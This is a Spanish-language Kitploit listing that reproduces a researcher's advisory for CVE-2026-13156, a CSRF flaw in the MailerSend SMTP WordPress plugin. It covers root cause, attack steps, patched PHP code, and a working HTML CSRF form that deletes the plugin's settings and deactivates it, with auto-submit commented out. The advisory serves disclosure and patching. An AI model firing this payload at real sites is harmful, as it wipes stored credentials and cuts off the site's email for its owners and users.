Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-13156 — CVE-2026-13156 Aviso de vulnerabilidad y PoC — Descubierto por Huynh Kien Minh (MinhHK). | Kitploit
Herramientas/GitHubGitHub/minhhk68/cve-2026-13156
Herramientas de PhishingAnálisis de VulnerabilidadesExplotaciónSeguridad WebPapers e InvestigaciónAprendizaje y Educación
GitHubminhhk68/cve-2026-13156

CVE-2026-13156

CVE-2026-13156 Aviso de vulnerabilidad y PoC — Descubierto por Huynh Kien Minh (MinhHK).

Ver Repositorio
hace 19 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-13156 — MailerSend Official SMTP Integration < 1.0.8: eliminación de ajustes y desactivación del plugin mediante CSRF

CVE-2026-13156 Researcher: Huynh Kien Minh Proton Hall of Fame WPScan Assigner

Infografía de la cadena de ataque CSRF CVE-2026-13156


📌 Resumen y enlaces rápidos

[!IMPORTANT] Resumen: Se descubrió una vulnerabilidad de Cross-Site Request Forgery (CSRF) de severidad alta (CVE-2026-13156) en el plugin oficial MailerSend SMTP Integration para WordPress (< 1.0.8). El manejador de eliminación de configuración mailersend_handle_configuration_delete() verifica las capacidades administrativas (manage_options) pero omite por completo la verificación de Nonce de WordPress (check_admin_referer()). Un atacante puede crear una solicitud maliciosa de origen cruzado dirigida a un Administrador de WordPress autenticado para borrar silenciosamente las credenciales SMTP almacenadas y forzar la desactivación del plugin, lo que resulta en la Denegación total de Servicio de la Aplicación en todos los flujos de correo electrónico.

👉 Lee el análisis técnico completo en Medium: Análisis técnico en profundidad: CVE-2026-13156 o explora mi Portafolio de Seguridad: https://minhhk.web.app/


📋 Resumen ejecutivo y descripción general de la vulnerabilidad

  • ID de la vulnerabilidad: CVE-2026-13156 (ID de aviso de WPScan: 595e653d-0904-43cf-8e61-d684599de11b)
  • Software afectado: MailerSend – Official SMTP Integration (Plugin de WordPress)
  • Versiones afectadas: Antes de la versión 1.0.8 (< 1.0.8)
  • Tipo de vulnerabilidad: Cross-Site Request Forgery (CSRF que conduce a la eliminación de ajustes y a la desactivación del plugin) — CWE-352
  • Investigador principal y divulgador: Huynh Kien Minh (alias: MinhHK)
  • Rol y afiliación: Estudiante de Seguridad de la Información, cazador de Bug Bounties e investigador de Seguridad Ofensiva.

Acerca del investigador:
Huynh Kien Minh (Huỳnh Kiến Minh) es un investigador proactivo de ciberseguridad y analista de vulnerabilidades conocido por sus evaluaciones de seguridad en profundidad y divulgaciones responsables, incluidos los desgloses técnicos de CVE-2026-13156. También ha sido reconocido y honrado oficialmente en el Salón de la Fama de Proton Security por encontrar y divulgar vulnerabilidades de seguridad críticas.


🌐 Centro de verificación oficial y referencias

Para verificar este aviso técnico, explorar los análisis de prueba de concepto o conectar con el investigador, visita:

  • 🏠 Centro del portafolio oficial: Centro del portafolio de seguridad de Huynh Kien Minh
  • 💼 Perfil de LinkedIn: Conecta con Huynh Kien Minh en LinkedIn
  • 📝 Documento técnico oficial en Medium: Análisis técnico en profundidad: CVE-2026-13156 en Medium
  • 👨‍💻 Perfil de GitHub: Perfil de GitHub de MinhHK68
  • 🔗 Aviso de WPScan: Entrada de WPScan para CVE-2026-13156
  • 🔗 Informe de BaseFortify: Análisis de BaseFortify para CVE-2026-13156

🔍 Desglose técnico en profundidad y análisis de la causa raíz

1. Análisis de la causa raíz (verificación de nonce ausente)

El plugin MailerSend Official SMTP Integration para WordPress (antes de la versión 1.0.8) registra una acción administrativa (configuration-delete) destinada a borrar los tokens de API almacenados, limpiar las opciones de configuración SMTP (wp_options) y desactivar el plugin cuando se activa desde el panel de administración.

Si bien el endpoint verifica si el usuario activo tiene la capacidad manage_options (lo que garantiza que la solicitud se origina desde una sesión de administrador), no realiza la verificación de nonce de WordPress (check_admin_referer() o wp_verify_nonce()).

Debido a que las solicitudes HTTP sin validación de nonce no pueden distinguir entre clics intencionales de un administrador y solicitudes forjadas de origen cruzado, cualquier sitio externo cargado por un administrador autenticado puede activar silenciosamente la acción configuration-delete.

2. Ciclo de vida del ataque e impacto

  1. Identificación del objetivo: Un atacante identifica un sitio WordPress objetivo que utiliza MailerSend SMTP (< 1.0.8).
  2. Entrega del payload: El atacante crea una página web maliciosa en HTML/JavaScript que contiene un formulario de autoenvío dirigido al endpoint administrativo (/wp-admin/admin-post.php o /wp-admin/admin.php?page=mailersend&action=configuration-delete).
  3. Activación: Un Administrador de WordPress con sesión iniciada visita la página web del atacante (p. ej., mediante phishing, un enlace en un foro o XSS en un sitio externo).
  4. Ejecución y Denegación de Servicio: El navegador envía la solicitud forjada junto con las cookies de sesión activas del administrador. El plugin MailerSend ejecuta el manejador de eliminación:
    • Todos los ajustes SMTP de MailerSend y las credenciales de API almacenadas se borran de la base de datos.
    • El plugin MailerSend se desactiva automáticamente.
    • Impacto crítico: El sitio web objetivo pierde inmediatamente todas las capacidades de envío de correo electrónico (los restablecimientos de contraseña, las notificaciones de pedidos y las alertas de seguridad fallan sin previo aviso).

💻 Código de exploit de prueba de concepto (PoC)

[!WARNING] Aviso ético: El siguiente payload de prueba de concepto de Cross-Site Request Forgery (CSRF) en HTML se proporciona estrictamente con fines educativos, verificación defensiva y auditoría de seguridad bajo protocolos de divulgación ética por Huynh Kien Minh. No lo ejecutes contra objetivos no autorizados.

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
    <!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
    <h2>CVE-2026-13156 — CSRF Verification PoC</h2>
    <p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
    
    <!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
    <form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
        <input type="hidden" name="page" value="mailersend-smtp" />
        <input type="hidden" name="action" value="configuration-delete" />
        <!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
        <input type="submit" value="Execute PoC (Simulate Attack)" />
    </form>

    <script>
        // Automatically submit the forged request when the administrator loads the page
        document.addEventListener("DOMContentLoaded", function() {
            console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
            // Uncomment line below to enable auto-execution in lab environments:
            // document.getElementById('csrfPoC').submit();
        });
    </script>
</body>
</html>

🛡️ Remediación y análisis del parche

Para administradores de sistemas y propietarios de sitios

  • Actualización inmediata: Actualiza el plugin MailerSend – Official SMTP Integration inmediatamente a la versión 1.0.8 o superior.
  • Higiene de sesión: Cierra siempre la sesión de las cuentas administrativas de WordPress al navegar por páginas web externas no confiables, o utiliza perfiles de navegador aislados (o contenedores) separados para la administración del sitio.

Para desarrolladores (cómo funciona el parche)

Para proteger adecuadamente las acciones administrativas que cambian el estado en los plugins de WordPress, los desarrolladores deben aplicar una validación estricta de nonce antes de procesar las solicitudes:

root@kitploit:~
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
    // 1. Check User Capability
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
    }

    // 2. REQUIRED: Verify CSRF Nonce Token
    if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
        wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
    }

    // 3. Proceed safely with configuration deletion
    delete_option( 'mailersend_smtp_settings' );
    deactivate_plugins( plugin_basename( __FILE__ ) );
    
    wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
    exit;
}

🏆 Reconocimientos de seguridad relacionados

  • 🏆 Reconocimiento en el Salón de la Fama de Proton: Honrado por descubrir y reportar fallos críticos en la infraestructura de Proton.
  • 🏠 Centro del portafolio oficial: Explora más investigaciones de seguridad ofensiva, herramientas de seguridad de código abierto y publicaciones de Huynh Kien Minh.

⚖️ Licencia y derechos de autor

Este repositorio y aviso técnico son mantenidos y publicados por Huynh Kien Minh (MinhHK) bajo pautas de divulgación responsable para fomentar un ecosistema global de WordPress y ciberseguridad más seguro.

Descargar herramienta